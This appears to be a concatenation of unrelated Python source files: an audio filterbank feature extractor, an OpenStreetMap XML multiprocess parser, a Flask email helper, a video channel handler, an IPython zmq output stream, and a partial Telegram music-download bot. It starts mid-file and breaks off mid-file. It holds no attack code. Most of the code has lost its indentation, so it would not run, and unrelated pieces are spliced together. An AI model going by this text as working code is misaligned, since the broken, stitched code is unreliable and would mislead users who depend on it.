notificationjornada.start()
notificationfimjornada = Thread(target=NotificationFimJornada, args=[dir_path])
notificationfimjornada.start()
except:
sys.exit()
|
wav_to_fbank.py
|
#!/usr/bin/env python3
# encoding: utf-8
# Copyright 2019 Thai-Son Nguyen
# Licensed under the Apache License, Version 2.0 (the "License")
import os
import argparse
import multiprocessing
import numpy as np
from scipy.io import wavfile
from pynn.util import audio
from pynn.io import kaldi_io
def write_ark_thread(segs, out_ark, out_scp, args):
fbank_mat = audio.filter_bank(args.sample_rate, args.nfft, args.fbank)
cache_wav = ''
for seg in segs:
tokens = seg.split()
if args.seg_info:
wav, start, end = tokens[:3]
seg_name = '%s-%06.f-%06.f' % (wav, float(start)*100, float(end)*100)
else:
if len(tokens) == 1: tokens.append(tokens[0])
if len(tokens) == 2: tokens.extend(['0.0', '0.0'])
seg_name, wav, start, end = tokens[:4]
start, end = float(start), float(end)
if args.wav_path is not None:
wav = wav if wav.endswith('.wav') else wav + '.wav'
wav = args.wav_path + '/' + wav
if cache_wav != wav:
if not os.path.isfile(wav):
print('File %s does not exist' % wav)
continue
sample_rate, signal = wavfile.read(wav)
if sample_rate != args.sample_rate:
print('Wav %s is not in desired sample rate' % wav)
continue
cache_wav = wav
start = int(start * sample_rate)
end = -1 if end <= 0. else int(end * sample_rate)
if start >= len(signal) or start >= end:
print('Wrong segment %s' % seg_name)
continue
feats = audio.extract_fbank(signal[start:end], fbank_mat, sample_rate=sample_rate, nfft=args.nfft)
if len(feats) > args.max_len or len(feats) < args.min_len:
continue
if args.mean_norm:
feats = feats - feats.mean(axis=0, keepdims=True)
if args.fp16:
feats = feats.astype(np.float16)
dic = {seg_name: feats}
kaldi_io.write_ark(out_ark, dic, out_scp, append=True)
parser = argparse.ArgumentParser(description='pynn')
parser.add_argument('--seg-desc', help='segment description file', required=True)
parser.add_argument('--seg-info', help='append timestamps to the segment names', action='store_true')
parser.add_argument('--wav-path', help='path to wav files', type=str, default=None)
parser.add_argument('--sample-rate', help='sample rate', type=int, default=16000)
parser.add_argument('--fbank', help='number of filter banks', type=int, default=40)
parser.add_argument('--nfft', help='number of FFT points', type=int, default=256)
parser.add_argument('--max-len', help='maximum frames for a segment', type=int, default=10000)
parser.add_argument('--min-len', help='minimum frames for a segment', type=int, default=4)
parser.add_argument('--mean-norm', help='mean subtraction', action='store_true')
parser.add_argument('--fp16', help='use float16 instead of float32', action='store_true')
parser.add_argument('--output', help='output file', type=str, default='data')
parser.add_argument('--jobs', help='number of parallel jobs', type=int, default=1)
if __name__ == '__main__':
args = parser.parse_args()
segs = [line.rstrip('\n') for line in open(args.seg_desc, 'r')]
size = len(segs) // args.jobs
jobs = []
j = 0
for i in range(args.jobs):
l = len(segs) if i == (args.jobs-1) else j+size
sub_segs = segs[j:l]
j += size
out_ark = '%s.%d.ark' % (args.output, i)
out_scp = '%s.%d.scp' % (args.output, i)
process = multiprocessing.Process(
target=write_ark_thread, args=(sub_segs, out_ark, out_scp, args))
process.start()
jobs.append(process)
for job in jobs: job.join()
|
multiproc.py
|
# Copyright 2011 Omniscale GmbH & Co. KG
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mmap
import multiprocessing
import re
from queue import Empty
from imposm.parser.xml.parser import XMLParser
from imposm.parser.util import setproctitle
KiB = 1024
MiB = 1024*KiB
READ_SIZE = 512*KiB
class MMapReader(object):
def __init__(self, m, size):
self.m = m
self.m.seek(0)
self.size = size
def read(self, size=None):
if size is None:
size = self.size - self.m.tell()
else:
size = min(self.size - self.m.tell(), size)
return self.m.read(size)
def readline(self):
cur_pos = self.m.tell()
if cur_pos >= self.size:
return
nl_pos = self.m.find('\n')
self.m.seek(cur_pos)
return self.m.read(nl_pos-cur_pos)
def seek(self, n):
self.m.seek(n)
class XMLParserProcess(XMLParser, multiprocessing.Process):
def __init__(self, mmap_pool, mmap_queue, *args, **kw):
multiprocessing.Process.__init__(self)
XMLParser.__init__(self, *args, **kw)
self.daemon = True
self.mmap_pool = mmap_pool
self.mmap_queue = mmap_queue
def run(self):
setproctitle('imposm xml parser')
while True:
mmap_idx, size = self.mmap_queue.get()
if mmap_idx is None:
self.mmap_queue.task_done()
break
xml = MMapReader(self.mmap_pool.get(mmap_idx), size)
self.parse(xml)
self.mmap_queue.task_done()
self.mmap_pool.free(mmap_idx)
class XMLMultiProcParser(object):
nodes_tag_filter = None
ways_tag_filter = None
relations_tag_filter = None
def __init__(self, pool_size, nodes_queue=None, ways_queue=None,
relations_queue=None, coords_queue=None, marshal_elem_data=False):
self.pool_size = pool_size
self.pool = []
self.nodes_callback = nodes_queue.put if nodes_queue else None
self.ways_callback = ways_queue.put if ways_queue else None
self.relations_callback = relations_queue.put if relations_queue else None
self.coords_callback = coords_queue.put if coords_queue else None
xml_chunk_size=READ_SIZE
self.mmap_pool = MMapPool(pool_size*8, xml_chunk_size*8)
self.mmap_queue = multiprocessing.JoinableQueue(8)
self.marshal_elem_data = marshal_elem_data
def parse(self, stream):
assert not self.pool
for _ in range(self.pool_size):
proc = XMLParserProcess(self.mmap_pool, self.mmap_queue, nodes_callback=self.nodes_callback,
coords_callback=self.coords_callback, ways_callback=self.ways_callback,
relations_callback=self.relations_callback,
nodes_tag_filter=self.nodes_tag_filter,
ways_tag_filter=self.ways_tag_filter,
relations_tag_filter=self.relations_tag_filter,
marshal_elem_data=self.marshal_elem_data,
)
self.pool.append(proc)
proc.start()
chunker = XMLChunker(stream, self.mmap_pool, xml_chunk_size=READ_SIZE)
chunker.read(self.mmap_queue, coords_callback=self.coords_callback)
self.mmap_queue.join()
for proc in self.pool:
self.mmap_queue.put((None, None))
for proc in self.pool:
proc.join()
class MMapPool(object):
"""
Manages multiple mmap files.
The mmap files can be read and written in different processes.
"""
def __init__(self, n, mmap_size):
self.n = n
self.mmap_size = mmap_size
self.pool = [mmap.mmap(-1, mmap_size) for _ in range(n)]
self.free_mmaps = set(range(n))
self.free_queue = multiprocessing.JoinableQueue()
def new(self):
"""
Return a free mmap file.
:returns: index, mmap file
"""
if not self.free_mmaps:
self.free_mmaps.add(self.free_queue.get())
self.free_queue.task_done()
while True:
# fetch unless free_queue is empty
try:
self.free_mmaps.add(self.free_queue.get_nowait())
self.free_queue.task_done()
except Empty:
break
mmap_idx = self.free_mmaps.pop()
return mmap_idx, self.pool[mmap_idx]
def join(self):
while len(self.free_mmaps) < self.n:
self.free_mmaps.add(self.free_queue.get())
self.free_queue.task_done()
def get(self, idx):
"""
Return mmap file with `idx`.
"""
return self.pool[idx]
def free(self, idx):
"""
Mark mmap file with `idx` as free.
"""
self.free_queue.put(idx)
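
# Illustrative sketch (not part of the original module): the typical MMapPool life cycle as
# used by XMLChunker and XMLParserProcess -- acquire a buffer with new(), hand its index to a
# consumer, and have the consumer release it again with free().
def example_mmap_pool_roundtrip():
    pool = MMapPool(2, 512 * KiB)
    idx, buf = pool.new()   # grab a free mmap buffer
    buf.seek(0)             # a producer would write a chunk here
    pool.free(idx)          # the consumer marks the buffer as free again
    pool.join()             # blocks until every buffer has been returned
    return idx
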
class XMLChunker(object):
"""
Reads and chunks OSM XML file.
Reads OSM XML from `stream` and writes chunks of it into mmap files from
the `mmap_pool`.
:params xml_chunk_size: chunk XML after this many bytes
"""
def __init__(self, stream, mmap_pool, xml_chunk_size):
self.stream = stream
self.size = xml_chunk_size
self._last_line = None
self.mmap_pool = mmap_pool
self.current_mmap_idx = 0
self._skip_header()
def _skip_header(self):
for line in self.stream:
if line.lstrip().startswith('<node '):
self._last_line = line
return
def _new_xml_outstream(self):
self.current_mmap_idx, stream = self.mmap_pool.new()
stream.seek(0)
stream.write("<osm xmlns:xapi='http://www.informationfreeway.org/xapi/0.6'>")
return stream
def _finished_xml_outstream(self, last_line, stream):
if '</osm' not in last_line:
stream.write('</osm>\n')
return self.current_mmap_idx, stream.tell()
def read(self, mmaps_queue, coords_callback=None):
"""
Read and chunk all
"""
coord_node_match = None
xml_nodes = self._new_xml_outstream()
coords = []
coord_node_re_match = re.compile(r'^\s*<node id="(\d+)" .*lat="([-0-9.]+)" '
'lon="([-0-9.]+)".*/>').match
node_re_match = re.compile(r'^\s*<node .*/>').match
xml_nodes.write(self._last_line)
split = False
line = ''
for line in self.stream:
if coords_callback:
coord_node_match = coord_node_re_match(line)
if coord_node_match:
osm_id, lat, lon = coord_node_match.groups()
coords.append((int(osm_id), float(lon), float(lat)))
if len(coords) >= 512:
coords_callback(coords)
coords = []
else:
xml_nodes.write(line)
else:
xml_nodes.write(line)
if split:
if (line.rstrip().endswith(('</way>', '</node>', '</relation>'))
or (coords_callback and coord_node_match)
or (not coords_callback and node_re_match(line))):
mmaps_queue.put(self._finished_xml_outstream(line, xml_nodes))
xml_nodes = self._new_xml_outstream()
split = False
elif xml_nodes.tell() > self.size:
split = True
if coords_callback:
coords_callback(coords)
# we are at the end of the stream and assume we wrote the end tag
# to xml_nodes. we set line to closing tag here to avoid additional
# end tag in case the last line(s) is blank
line = '</osm'
mmaps_queue.put(self._finished_xml_outstream(line, xml_nodes))
if __name__ == '__main__':
import sys
def count_proc(type, queue):
def count():
count = 0
while True:
nodes = queue.get()
if nodes is None:
queue.task_done()
break
count += len(nodes)
queue.task_done()
print(type, count)
return count
nodes_queue = multiprocessing.JoinableQueue(128)
ways_queue = multiprocessing.JoinableQueue(128)
relations_queue = multiprocessing.JoinableQueue(128)
procs = [
multiprocessing.Process(target=count_proc('nodes', nodes_queue)),
multiprocessing.Process(target=count_proc('ways', ways_queue)),
multiprocessing.Process(target=count_proc('relations', relations_queue))
]
for proc in procs:
proc.start()
    parser = XMLMultiProcParser(2, nodes_queue=nodes_queue,
                                ways_queue=ways_queue, relations_queue=relations_queue)
    parser.parse(open(sys.argv[1]))
nodes_queue.put(None)
nodes_queue.join()
ways_queue.put(None)
ways_queue.join()
relations_queue.put(None)
relations_queue.join()
for proc in procs:
proc.join()
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from flask_mail import Mail
from app import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['MAIL_SUBJECT_PREFIX'] + ': ' + subject,
sender=app.config['MAIL_DEFAULT_SENDER'] , recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
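
# Illustrative usage sketch (not part of the original module): the template name and keyword
# arguments are placeholders, and the call must run inside an application/request context so
# that current_app resolves.
def example_send_welcome(recipient):
    return send_email(recipient, 'Welcome', 'email/welcome', user=recipient)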
|
channel_handler.py
|
# =======================================================================
#
# Copyright (C) 2018, Hisilicon Technologies Co., Ltd. All Rights Reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1 Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2 Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3 Neither the names of the copyright holders nor the names of the
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# =======================================================================
#
"""presenter channel manager module"""
import time
import logging
import threading
from threading import get_ident
from common.channel_manager import ChannelManager
# thread event timeout, The unit is second.
WEB_EVENT_TIMEOUT = 2
# thread event timeout, The unit is second.
IMAGE_EVENT_TIMEOUT = 10
# heart beat timeout, The unit is second.
HEARTBEAT_TIMEOUT = 100
class ThreadEvent():
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self, timeout=None):
self.events = {}
self.timeout = timeout
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait(self.timeout)
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].isSet():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class ChannelHandler():
"""A set of channel handlers, process data received from channel"""
def __init__(self, channel_name, media_type):
self.channel_name = channel_name
self.media_type = media_type
self.img_data = None
        self._frame = None
        self.thread = None
        # last time the channel received data.
self.heartbeat = time.time()
self.web_event = ThreadEvent(timeout=WEB_EVENT_TIMEOUT)
self.image_event = ThreadEvent(timeout=IMAGE_EVENT_TIMEOUT)
self.lock = threading.Lock()
self.channel_manager = ChannelManager([])
self.rectangle_list = None
self.point_list = None
if media_type == "video":
self.thread_name = "videothread-{}".format(self.channel_name)
self.heartbeat = time.time()
self.close_thread_switch = False
self.fps = 0
self.image_number = 0
self.time_list = []
self._create_thread()
def close_thread(self):
"""close thread if object has created"""
if self.thread is None:
return
self.set_thread_switch()
self.image_event.set()
logging.info("%s set _close_thread_switch True", self.thread_name)
def set_heartbeat(self):
"""record heartbeat"""
self.heartbeat = time.time()
def set_thread_switch(self):
"""record heartbeat"""
self.close_thread_switch = True
def save_image(self, data, width, height, rectangle_list, point_list):
"""save image receive from socket"""
self.width = width
self.height = height
self.rectangle_list = rectangle_list
self.point_list = point_list
# compute fps if type is video
if self.media_type == "video":
while self.img_data:
time.sleep(0.01)
self.time_list.append(self.heartbeat)
self.image_number += 1
while self.time_list[0] + 1 < time.time():
self.time_list.pop(0)
self.image_number -= 1
if self.image_number == 0:
break
self.fps = len(self.time_list)
self.img_data = data
self.image_event.set()
else:
self.img_data = data
self.channel_manager.save_channel_image(self.channel_name,
self.img_data, self.rectangle_list, self.point_list)
self.heartbeat = time.time()
def get_media_type(self):
"""get media_type, support image or video"""
return self.media_type
def get_image(self):
"""get image_data"""
return self.img_data
def _create_thread(self):
"""Start the background video thread if it isn't running yet."""
        if self.thread is not None and self.thread.is_alive():
return
# start background frame thread
self.thread = threading.Thread(target=self._video_thread)
self.thread.start()
def get_frame(self):
"""Return the current video frame."""
        # wait until a frame is received, then push it to the browser.
ret = self.web_event.wait()
self.web_event.clear()
# True: _web_event return because set()
# False: _web_event return because timeout
if ret:
return (self._frame, self.fps, self.width, self.height, self.rectangle_list, self.point_list)
return (None, None, None, None, None, None)
def frames(self):
"""a generator generates image"""
while True:
self.image_event.wait()
self.image_event.clear()
if self.img_data:
yield self.img_data
self.img_data = None
# if set _close_thread_switch, return immediately
if self.close_thread_switch:
yield None
            # if no frame or heartbeat has arrived within HEARTBEAT_TIMEOUT seconds,
            # stop the thread and close the socket
if time.time() - self.heartbeat > HEARTBEAT_TIMEOUT:
self.set_thread_switch()
self.img_data = None
yield None
def _video_thread(self):
"""background thread to process video"""
logging.info('create %s...', (self.thread_name))
for frame in self.frames():
if frame:
# send signal to clients
self._frame = frame
self.web_event.set()
# exit thread
if self.close_thread_switch:
self.channel_manager.clean_channel_resource_by_name(
self.channel_name)
logging.info('Stop thread:%s.', (self.thread_name))
break
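# --- Hedged usage sketch (added for illustration, not part of the original module) ---
# Shows how a per-client consumer might drain ChannelHandler.get_frame() in a loop,
# e.g. to feed a multipart HTTP response. The generator name and the way the handler
# is obtained are assumptions; only get_frame()'s tuple contract comes from the code above.
def example_frame_consumer(handler):
    """Yield raw frame bytes from a ChannelHandler until the web event times out."""
    while True:
        frame, fps, width, height, rectangles, points = handler.get_frame()
        if frame is None:
            # get_frame() returned because web_event timed out; stop serving this client.
            break
        yield frame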
|
iostream.py
|
# coding: utf-8
"""Wrappers for forwarding stdout/stderr over zmq"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
import atexit
from binascii import b2a_hex
from collections import deque
try:
from importlib import lock_held as import_lock_held
except ImportError:
from imp import lock_held as import_lock_held
import os
import sys
import threading
import warnings
from io import StringIO, TextIOBase
import zmq
from zmq.eventloop.ioloop import IOLoop
from zmq.eventloop.zmqstream import ZMQStream
from jupyter_client.session import extract_header
from ipython_genutils import py3compat
from ipython_genutils.py3compat import unicode_type
#-----------------------------------------------------------------------------
# Globals
#-----------------------------------------------------------------------------
MASTER = 0
CHILD = 1
#-----------------------------------------------------------------------------
# IO classes
#-----------------------------------------------------------------------------
class IOPubThread(object):
"""An object for sending IOPub messages in a background thread
Prevents a blocking main thread from delaying output from threads.
IOPubThread(pub_socket).background_socket is a Socket-API-providing object
whose IO is always run in a thread.
"""
def __init__(self, socket, pipe=False):
"""Create IOPub thread
Parameters
----------
socket: zmq.PUB Socket
the socket on which messages will be sent.
pipe: bool
Whether this process should listen for IOPub messages
piped from subprocesses.
"""
self.socket = socket
self.background_socket = BackgroundSocket(self)
self._master_pid = os.getpid()
self._pipe_flag = pipe
self.io_loop = IOLoop(make_current=False)
if pipe:
self._setup_pipe_in()
self._local = threading.local()
self._events = deque()
self._setup_event_pipe()
self.thread = threading.Thread(target=self._thread_main)
self.thread.daemon = True
def _thread_main(self):
"""The inner loop that's actually run in a thread"""
self.io_loop.make_current()
self.io_loop.start()
self.io_loop.close(all_fds=True)
def _setup_event_pipe(self):
"""Create the PULL socket listening for events that should fire in this thread."""
ctx = self.socket.context
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
_uuid = b2a_hex(os.urandom(16)).decode('ascii')
iface = self._event_interface = 'inproc://%s' % _uuid
pipe_in.bind(iface)
self._event_puller = ZMQStream(pipe_in, self.io_loop)
self._event_puller.on_recv(self._handle_event)
@property
def _event_pipe(self):
"""thread-local event pipe for signaling events that should be processed in the thread"""
try:
event_pipe = self._local.event_pipe
except AttributeError:
# new thread, new event pipe
ctx = self.socket.context
event_pipe = ctx.socket(zmq.PUSH)
event_pipe.linger = 0
event_pipe.connect(self._event_interface)
self._local.event_pipe = event_pipe
return event_pipe
def _handle_event(self, msg):
"""Handle an event on the event pipe
Content of the message is ignored.
Whenever *an* event arrives on the event stream,
*all* waiting events are processed in order.
"""
# freeze event count so new writes don't extend the queue
# while we are processing
n_events = len(self._events)
for i in range(n_events):
event_f = self._events.popleft()
event_f()
def _setup_pipe_in(self):
"""setup listening pipe for IOPub from forked subprocesses"""
ctx = self.socket.context
# use UUID to authenticate pipe messages
self._pipe_uuid = os.urandom(16)
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
try:
self._pipe_port = pipe_in.bind_to_random_port("tcp://127.0.0.1")
except zmq.ZMQError as e:
warnings.warn("Couldn't bind IOPub Pipe to 127.0.0.1: %s" % e +
"\nsubprocess output will be unavailable."
)
self._pipe_flag = False
pipe_in.close()
return
self._pipe_in = ZMQStream(pipe_in, self.io_loop)
self._pipe_in.on_recv(self._handle_pipe_msg)
def _handle_pipe_msg(self, msg):
"""handle a pipe message from a subprocess"""
if not self._pipe_flag or not self._is_master_process():
return
if msg[0] != self._pipe_uuid:
print("Bad pipe message: %s", msg, file=sys.__stderr__)
return
self.send_multipart(msg[1:])
def _setup_pipe_out(self):
# must be new context after fork
ctx = zmq.Context()
pipe_out = ctx.socket(zmq.PUSH)
pipe_out.linger = 3000 # 3s timeout for pipe_out sends before discarding the message
pipe_out.connect("tcp://127.0.0.1:%i" % self._pipe_port)
return ctx, pipe_out
def _is_master_process(self):
return os.getpid() == self._master_pid
def _check_mp_mode(self):
"""check for forks, and switch to zmq pipeline if necessary"""
if not self._pipe_flag or self._is_master_process():
return MASTER
else:
return CHILD
def start(self):
"""Start the IOPub thread"""
self.thread.start()
# make sure we don't prevent process exit
# I'm not sure why setting daemon=True above isn't enough, but it doesn't appear to be.
atexit.register(self.stop)
def stop(self):
"""Stop the IOPub thread"""
if not self.thread.is_alive():
return
self.io_loop.add_callback(self.io_loop.stop)
self.thread.join()
if hasattr(self._local, 'event_pipe'):
self._local.event_pipe.close()
def close(self):
if self.closed:
return
self.socket.close()
self.socket = None
@property
def closed(self):
return self.socket is None
def schedule(self, f):
"""Schedule a function to be called in our IO thread.
If the thread is not running, call immediately.
"""
if self.thread.is_alive():
self._events.append(f)
# wake event thread (message content is ignored)
self._event_pipe.send(b'')
else:
f()
def send_multipart(self, *args, **kwargs):
"""send_multipart schedules actual zmq send in my thread.
If my thread isn't running (e.g. forked process), send immediately.
"""
self.schedule(lambda : self._really_send(*args, **kwargs))
def _really_send(self, msg, *args, **kwargs):
"""The callback that actually sends messages"""
mp_mode = self._check_mp_mode()
if mp_mode != CHILD:
# we are master, do a regular send
self.socket.send_multipart(msg, *args, **kwargs)
else:
# we are a child, pipe to master
# new context/socket for every pipe-out
# since forks don't teardown politely, use ctx.term to ensure send has completed
ctx, pipe_out = self._setup_pipe_out()
pipe_out.send_multipart([self._pipe_uuid] + msg, *args, **kwargs)
pipe_out.close()
ctx.term()
class BackgroundSocket(object):
"""Wrapper around IOPub thread that provides zmq send[_multipart]"""
io_thread = None
def __init__(self, io_thread):
self.io_thread = io_thread
def __getattr__(self, attr):
"""Wrap socket attr access for backward-compatibility"""
if attr.startswith('__') and attr.endswith('__'):
# don't wrap magic methods
super(BackgroundSocket, self).__getattr__(attr)
if hasattr(self.io_thread.socket, attr):
warnings.warn("Accessing zmq Socket attribute %s on BackgroundSocket" % attr,
DeprecationWarning, stacklevel=2)
return getattr(self.io_thread.socket, attr)
super(BackgroundSocket, self).__getattr__(attr)
def __setattr__(self, attr, value):
        if attr == 'io_thread' or (attr.startswith('__') and attr.endswith('__')):
super(BackgroundSocket, self).__setattr__(attr, value)
else:
warnings.warn("Setting zmq Socket attribute %s on BackgroundSocket" % attr,
DeprecationWarning, stacklevel=2)
setattr(self.io_thread.socket, attr, value)
def send(self, msg, *args, **kwargs):
return self.send_multipart([msg], *args, **kwargs)
def send_multipart(self, *args, **kwargs):
"""Schedule send in IO thread"""
return self.io_thread.send_multipart(*args, **kwargs)
class OutStream(TextIOBase):
"""A file like object that publishes the stream to a 0MQ PUB socket.
Output is handed off to an IO Thread
"""
# timeout for flush to avoid infinite hang
# in case of misbehavior
flush_timeout = 10
# The time interval between automatic flushes, in seconds.
flush_interval = 0.2
topic = None
encoding = 'UTF-8'
def __init__(self, session, pub_thread, name, pipe=None, echo=None):
if pipe is not None:
warnings.warn("pipe argument to OutStream is deprecated and ignored",
DeprecationWarning)
# This is necessary for compatibility with Python built-in streams
self.session = session
if not isinstance(pub_thread, IOPubThread):
# Backward-compat: given socket, not thread. Wrap in a thread.
warnings.warn("OutStream should be created with IOPubThread, not %r" % pub_thread,
DeprecationWarning, stacklevel=2)
pub_thread = IOPubThread(pub_thread)
pub_thread.start()
self.pub_thread = pub_thread
self.name = name
self.topic = b'stream.' + py3compat.cast_bytes(name)
self.parent_header = {}
self._master_pid = os.getpid()
self._flush_pending = False
self._subprocess_flush_pending = False
self._io_loop = pub_thread.io_loop
self._new_buffer()
self.echo = None
if echo:
if hasattr(echo, 'read') and hasattr(echo, 'write'):
self.echo = echo
else:
raise ValueError("echo argument must be a file like object")
def _is_master_process(self):
return os.getpid() == self._master_pid
def set_parent(self, parent):
self.parent_header = extract_header(parent)
def close(self):
self.pub_thread = None
@property
def closed(self):
return self.pub_thread is None
def _schedule_flush(self):
"""schedule a flush in the IO thread
call this on write, to indicate that flush should be called soon.
"""
if self._flush_pending:
return
self._flush_pending = True
# add_timeout has to be handed to the io thread via event pipe
def _schedule_in_thread():
self._io_loop.call_later(self.flush_interval, self._flush)
self.pub_thread.schedule(_schedule_in_thread)
def flush(self):
"""trigger actual zmq send
send will happen in the background thread
"""
if self.pub_thread and self.pub_thread.thread is not None and self.pub_thread.thread.is_alive():
# request flush on the background thread
self.pub_thread.schedule(self._flush)
# wait for flush to actually get through, if we can.
# waiting across threads during import can cause deadlocks
# so only wait if import lock is not held
if not import_lock_held():
evt = threading.Event()
self.pub_thread.schedule(evt.set)
                # and give a timeout to avoid hanging forever if the IO thread is wedged
if not evt.wait(self.flush_timeout):
# write directly to __stderr__ instead of warning because
# if this is happening sys.stderr may be the problem.
print("IOStream.flush timed out", file=sys.__stderr__)
else:
self._flush()
def _flush(self):
"""This is where the actual send happens.
_flush should generally be called in the IO thread,
unless the thread has been destroyed (e.g. forked subprocess).
"""
self._flush_pending = False
self._subprocess_flush_pending = False
if self.echo is not None:
try:
self.echo.flush()
except OSError as e:
if self.echo is not sys.__stderr__:
print("Flush failed: {}".format(e),
file=sys.__stderr__)
data = self._flush_buffer()
if data:
# FIXME: this disables Session's fork-safe check,
# since pub_thread is itself fork-safe.
# There should be a better way to do this.
self.session.pid = os.getpid()
content = {u'name':self.name, u'text':data}
self.session.send(self.pub_thread, u'stream', content=content,
parent=self.parent_header, ident=self.topic)
def write(self, string):
if self.echo is not None:
try:
self.echo.write(string)
except OSError as e:
if self.echo is not sys.__stderr__:
print("Write failed: {}".format(e),
file=sys.__stderr__)
if self.pub_thread is None:
raise ValueError('I/O operation on closed file')
else:
# Make sure that we're handling unicode
if not isinstance(string, unicode_type):
string = string.decode(self.encoding, 'replace')
is_child = (not self._is_master_process())
# only touch the buffer in the IO thread to avoid races
self.pub_thread.schedule(lambda : self._buffer.write(string))
if is_child:
# mp.Pool cannot be trusted to flush promptly (or ever),
# and this helps.
if self._subprocess_flush_pending:
return
self._subprocess_flush_pending = True
# We can not rely on self._io_loop.call_later from a subprocess
self.pub_thread.schedule(self._flush)
else:
self._schedule_flush()
def writelines(self, sequence):
if self.pub_thread is None:
raise ValueError('I/O operation on closed file')
else:
for string in sequence:
self.write(string)
def writable(self):
return True
def _flush_buffer(self):
"""clear the current buffer and return the current buffer data.
This should only be called in the IO thread.
"""
data = u''
if self._buffer is not None:
buf = self._buffer
self._new_buffer()
data = buf.getvalue()
buf.close()
return data
def _new_buffer(self):
self._buffer = StringIO()
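# --- Hedged usage sketch (added for illustration, not part of ipykernel) ---
# Shows how the pieces above are typically wired together: a zmq PUB socket is wrapped
# in an IOPubThread, and an OutStream bound to that thread replaces sys.stdout so that
# print() output is forwarded over zmq. The port number and the bare Session() are assumptions.
def _example_redirect_stdout():
    from jupyter_client.session import Session
    ctx = zmq.Context.instance()
    pub_socket = ctx.socket(zmq.PUB)
    pub_socket.bind("tcp://127.0.0.1:5556")      # illustrative port only
    iopub_thread = IOPubThread(pub_socket, pipe=False)
    iopub_thread.start()
    sys.stdout = OutStream(Session(), iopub_thread, "stdout")
    print("hello over IOPub")                    # buffered, then flushed in the IO thread
    sys.stdout.flush()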
|
bot.py
|
import os
import youtube_dl
import telepotpro
from random import randint
from multiprocessing import Process
from youtubesearchpython import VideosSearch
from dotenv import load_dotenv
from os.path import join, dirname
dotenv_path = join(dirname(__file__), '.env')
load_dotenv(dotenv_path)
TOKEN = os.environ.get("TOKEN")
bot = telepotpro.Bot(TOKEN)
class Music:
def __init__(self, user_input, msg):
self.chat = Chat
self.user_input = user_input[6:]
def search_music(self, user_input):
return VideosSearch(user_input, limit = 1).result()
def get_link(self, result):
return result['result'][0]['link']
def get_title(self, result):
return result['result'][0]['title']
def get_duration(self, result):
result = result['result'][0]['duration'].split(':')
min_duration = int(result[0])
split_count = len(result)
return min_duration, split_count
def download_music(self, file_name, link):
ydl_opts = {
'outtmpl': './'+file_name,
'format': 'bestaudio/best',
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '256',
}],
'prefer_ffmpeg': True
}
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
info_dict = ydl.extract_info(link, download=True)
pass
class Chat:
def __init__(self, msg):
self.chat_id = msg['chat']['id']
self.user_input = msg['text']
self.user_input = self.user_input.replace('@TLMusicDownloader_bot', '')
self.user_name = msg['from']['first_name']
self.message_id = msg['message_id']
self.messages = {
'start':'🤖 Hello, '+ self.user_name +'!\n\n'
'📩 Send me:\n\n'
'"*/music* _song name_" or\n'
'"*/music* _musician name - song name_"\n\n'
'to order some music. 🎶\n\n'
'BOT BY @SAHEEDS_BOTS',
'spotify_input_error':"‼️ *Oops! The bot doesn't support Spotify links!*\n"
'Try: "*/music* _song name_"\n'
'or: "*/music* _musician name - song name_"',
'invalid_command':'‼️ *Oops! Invalid command!*\n'
'Try: "*/music* _song name_"\n'
'or: "*/music* _musician name - song name_"',
